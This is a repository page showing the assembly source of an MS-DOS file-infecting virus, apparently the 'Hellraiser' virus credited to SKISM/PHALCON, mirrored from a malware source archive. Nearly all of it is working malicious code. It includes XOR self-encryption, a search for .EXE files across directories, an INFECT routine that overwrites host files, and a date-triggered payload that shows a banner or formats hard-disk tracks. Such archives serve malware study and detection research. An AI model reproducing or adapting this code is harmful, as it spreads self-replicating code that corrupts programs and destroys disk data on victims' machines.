ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
e2d9bb12d0
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.hr.asm
vxunderground dda6c7045d
Add files via upload
2021-01-12 17:44:11 -06:00

413 lines
18 KiB
NASM
Raw Blame History

;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
START: JMP Short BEGIN
;---------------------------------------------------
NOP
ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32
BEGIN: CALL CRYPT ; Decrypt the virus
JMP H00520
;---------------------------------------------------
CRYPT: PUSH CX
MOV SI,OFFSET MESSAGE
MOV DI,SI
MOV CX,0766h
CLD
LOOP_1: LODSW
XOR AX,DS:ENCRKEY ;DS may not be needed
STOSW
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
INFECT: MOV DX,0100h ;Offset to begin at
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;I don't know why, BX doesn't change.
MOV CX,062Ch ;CX=number of bytes to write
CALL CRYPT ;Encrypt before saving
POP BX ;I don't know why, BX doesn't change.
MOV AX,4000h ;AH = 40h, write to file.
INT 21h ;Infect the file.
PUSH BX ;Again, BX never changes.
CALL CRYPT ; . . . . . . . . .
POP BX
RET ;RET_Near
;---------------------------------------------------
; This is the big, red, block letters that shows when it goes off.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;This area is perplexing. Doesn't seem to be ever called, nor read from.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
DB "ARMOR" ;0047B 41524D4F52
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488
DB 8 DUP("?") ;00489 3F
DB "EXE" ;00491 455845
DB 07h ;00494
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E
DB "x" ;0049F 78
DB 0F0h ;004A0
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3
DB "-]" ;004B4 2D5D
DB 04h ;004B6
DB 88h ;004B7
DB 04h ;004B8
DB 9Eh ;004B9
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
HANDLE: DB 05h ;004FC
DB 00h ;004FD
DB 02h ;004FE
DB "x" ;004FF 78
DB 0F0h ;00500
DB 16h ;00501
DB " " ;00502 20
DB 00h ;00503
DB 0CDh ;00504
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____
; Check to see if it's the last Friday in month, if so, go off.
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___
;---------------------------------------------------
; GO OFF!
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000
MOV CX,0319h ;00560 B91903
CALL H0057E ; . . . . . . . . . ;00563 E81800
JMP Short H00531 ;00566 EBC9
;---------------------------------------------------
H00568: JMP Short H005DC ;00568 EB72 _r
;---------------------------------------------------
NOP ;0056A 90 _
H0056B: JMP H0061E ;0056B E9B000 ___
;---------------------------------------------------
DB " -=PHALCON=- " ;0056E 20202D3D504841
DB 00h ;0057D
;---------------------------------------------------
; Display message... TheDraw algorythm for unpacking image.
H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[
MOV DX,DI ;00580 8BD7 __
XOR AX,AX ;00582 33C0 3_
CLD ;00584 FC _
H00585: LODSB ;Take a byte ;00585 AC _
CMP AL,20h ;If it's <space ;00586 3C20 <
JB H0058F ;Jump ;00588 7205 r_
STOSW ;Move to screen ;0058A AB _
H0058B: LOOP H00585 ;0058B E2F8 __
JMP Short H005DB ;0058D EB4C _L
;---------------------------------------------------
H0058F: CMP AL,10h ;If it's not<10h ;0058F 3C10 <_
JNB H0059A ;Jump ;00591 7307 s_
AND AH,0F0h ;00593 80E4F0 ___
OR AH,AL ;00596 0AE0 __
JMP Short H0058B ;00598 EBF1 __
;---------------------------------------------------
H0059A: CMP AL,18h ;0059A 3C18 <_
JZ H005B1 ;0059C 7413 t_
JNB H005B9 ;0059E 7319 s_
SUB AL,10h ;005A0 2C10 ,_
ADD AL,AL ;005A2 02C0 __
ADD AL,AL ;005A4 02C0 __
ADD AL,AL ;005A6 02C0 __
ADD AL,AL ;005A8 02C0 __
AND AH,8Fh ;005AA 80E48F ___
OR AH,AL ;005AD 0AE0 __
JMP Short H0058B ;005AF EBDA __
;---------------------------------------------------
H005B1: ADD DX,00A0h ;005B1 81C2A000 ____
MOV DI,DX ;005B5 8BFA __
JMP Short H0058B ;005B7 EBD2 __
;---------------------------------------------------
H005B9: CMP AL,1Bh ;005B9 3C1B <_
JB H005C4 ;005BB 7207 r_
JNZ H0058B ;005BD 75CC u_
XOR AH,80h ;005BF 80F480 ___
JMP Short H0058B ;005C2 EBC7 __
;---------------------------------------------------
H005C4: CMP AL,19h ;005C4 3C19 <_
MOV BX,CX ;005C6 8BD9 __
LODSB ;005C8 AC _
MOV CL,AL ;005C9 8AC8 __
MOV AL,20h ;005CB B020 _
JZ H005D1 ;005CD 7402 t_
LODSB ;005CF AC _
DEC BX ;005D0 4B K
H005D1: XOR CH,CH ;005D1 32ED 2_
INC CX ;005D3 41 A
REPZ STOSW ;005D4 F3AB __
MOV CX,BX ;005D6 8BCB __
DEC CX ;005D8 49 I
LOOPNZ H00585 ;005D9 E0AA __
H005DB: RET ;RET_Near ;005DB C3 _
;End of display message procedure
;---------------------------------------------------
H005DC: MOV AH,15h ;005DC B415 __
MOV DL,80h ;005DE B280 __
INT 13h ;BAT-Dsk_Type ;005E0 CD13 __
CMP AH,03h ;005E2 80FC03 ___
JNZ H005F2 ;005E5 750B u_
MOV AX,0504h ;005E7 B80405 ___
MOV CX,DS:[0103h] ;005EA 8B0E0301 ____
MOV DL,80h ;005EE B280 __
INT 13h ;B-Fmt_FD_Trk ;005F0 CD13 __
H005F2: MOV DX,045Dh ;005F2 BA5D04 _]_
MOV AH,1Ah ;005F5 B41A __
INT 21h ;1-Set_DTA ;005F7 CD21 _!
MOV AH,19h ;005F9 B419 __
INT 21h ;1-Get_Cur_Dr ;005FB CD21 _!
MOV DL,AL ;005FD 8AD0 __
INC DL ;005FF FEC2 __
MOV AH,47h ;00601 B447 _G
MOV SI,04BCh ;00603 BEBC04 ___
INT 21h ;2-Cur_Dir ;00606 CD21 _!
MOV DX,045Bh ;00608 BA5B04 _[_
MOV AH,3Bh ;0060B B43B _;
INT 21h ;2-Chg_Dir ;0060D CD21 _!
MOV CX,0013h ;0060F B91300 ___
MOV DX,0453h ;00612 BA5304 _S_
MOV AH,4Eh ;00615 B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;00617 CD21 _!
CMP AX,0012h ;00619 3D1200 =__
JNZ H00621 ;0061C 7503 u_
H0061E: JMP Short H00671 ;0061E EB51 _Q
;---------------------------------------------------
NOP ;00620 90 _
H00621: MOV AH,4Fh ;00621 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00623 CD21 _!
CMP AX,0012h ;00625 3D1200 =__
JZ H00671 ;00628 7447 tG
MOV DX,047Bh ;0062A BA7B04 _{_
MOV AH,3Bh ;0062D B43B _;
INT 21h ;2-Chg_Dir ;0062F CD21 _!
MOV AH,2Fh ;00631 B42F _/
INT 21h ;2-Get_DTA ;00633 CD21 _!
MOV DS:[04B3h],ES ;00635 8C06B304 ____
MOV DS:[04B5h],BX ;00639 891EB504 ____
MOV DX,0488h ;0063D BA8804 ___
MOV AH,1Ah ;00640 B41A __
INT 21h ;1-Set_DTA ;00642 CD21 _!
MOV CX,0007h ;00644 B90700 ___
MOV DX,0455h ;00647 BA5504 _U_
MOV AH,4Eh ;0064A B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;0064C CD21 _!
CMP AX,0012h ;0064E 3D1200 =__
JNZ H00674 ;00651 7521 u!
H00653: MOV AH,4Fh ;00653 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00655 CD21 _!
CMP AX,0012h ;00657 3D1200 =__
JNZ H00674 ;0065A 7518 u_
MOV DX,045Bh ;0065C BA5B04 _[_
MOV AH,3Bh ;0065F B43B _;
INT 21h ;2-Chg_Dir ;00661 CD21 _!
MOV AH,1Ah ;00663 B41A __
MOV DS,DS:[04B3h] ;DS_Chg ;00665 8E1EB304 ____
MOV DX,DS:[04B5h] ;00669 8B16B504 ____
INT 21h ;1-Set_DTA ;0066D CD21 _!
JMP Short H00621 ;0066F EBB0 __
;---------------------------------------------------
H00671: JMP Short H006EC ;00671 EB79 _y
;---------------------------------------------------
NOP ;00673 90 _
H00674: MOV AH,2Fh ;00674 B42F _/
INT 21h ;2-Get_DTA ;00676 CD21 _!
MOV DS:[04B9h],ES ;00678 8C06B904 ____
MOV DS:[04B7h],BX ;0067C 891EB704 ____
MOV DX,04A6h ;00680 BAA604 ___
MOV BX,0488h ;00683 BB8804 ___
MOV AX,[BX+18h] ;00686 8B4718 _G_
MOV DS:[0500h],AX ;00689 A30005 ___
MOV AX,[BX+16h] ;0068C 8B4716 _G_
MOV DS:[04FEh],AX ;0068F A3FE04 ___
MOV AX,[BX+15h] ;00692 8B4715 _G_
MOV AX,4300h ;00695 B80043 __C
INT 21h ;2-Fl_Hdl_Attr ;00698 CD21 _!
MOV DS:[0502h],CX ;0069A 890E0205 ____
MOV AX,4301h ;0069E B80143 __C
XOR CX,CX ;006A1 33C9 3_
INT 21h ;1-TERM_norm:21h-00h;006A3 CD21 _!
;---------------------------------------------------
MOV AX,3D00h ;006A5 B8003D __=
INT 21h ;2-Open_Fl_Hdl ;006A8 CD21 _!
JB H006CF ;006AA 7223 r#
MOV DS:[HANDLE],AX ;006AC A3FC04 ___
MOV AH,3Fh ;006AF B43F _?
MOV BX,DS:[HANDLE] ;006B1 8B1EFC04 ____
MOV CX,0002h ;006B5 B90200 ___
MOV DX,0504h ;006B8 BA0405 ___
INT 21h ;2-Rd_Fl_Hdl ;006BB CD21 _!
MOV AH,3Eh ;006BD B43E _>
MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____
INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _!
MOV BX,DS:[0504h] ;006C5 8B1E0405 ____
CMP BX,03EBh ;006C9 81FBEB03 ____
JNZ H006DE ;006CD 750F u_
H006CF: MOV AH,1Ah ;006CF B41A __
MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____
MOV DX,DS:[04B7h] ;006D5 8B16B704 ____
INT 21h ;1-Set_DTA ;006D9 CD21 _!
JMP H00653 ;006DB E975FF _u_
;---------------------------------------------------
H006DE: MOV DX,04A6h ;006DE BAA604 ___
MOV AX,3D02h ;006E1 B8023D __=
INT 21h ;2-Open_Fl_Hdl ;006E4 CD21 _!
MOV DS:[HANDLE],AX ;006E6 A3FC04 ___
CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_
H006EC: MOV AX,5701h ;006EC B80157 __W
MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____
MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____
MOV DX,DS:[0500h] ;006F7 8B160005 ____
INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _!
MOV AX,4301h ;006FD B80143 __C
MOV CX,DS:[0502h] ;00700 8B0E0205 ____
MOV DX,04A6h ;00704 BAA604 ___
INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _!
MOV AH,3Bh ;00709 B43B _;
MOV DX,045Bh ;0070B BA5B04 _[_
INT 21h ;2-Chg_Dir ;0070E CD21 _!
MOV AH,3Bh ;00710 B43B _;
MOV DX,04BCh ;00712 BABC04 ___
INT 21h ;2-Chg_Dir ;00715 CD21 _!
MOV AX,4C00h ;00717 B8004C __L
INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _!
;---------------------------------------------------
DB "Hellraiser/SKISM" ;0071C 48656C6C726169
;---------------------------------------------------
P00100 ENDP
CODE ENDS
END H00100
;-------------------------------------------------------------------------------
Reference in New Issue View Git Blame Copy Permalink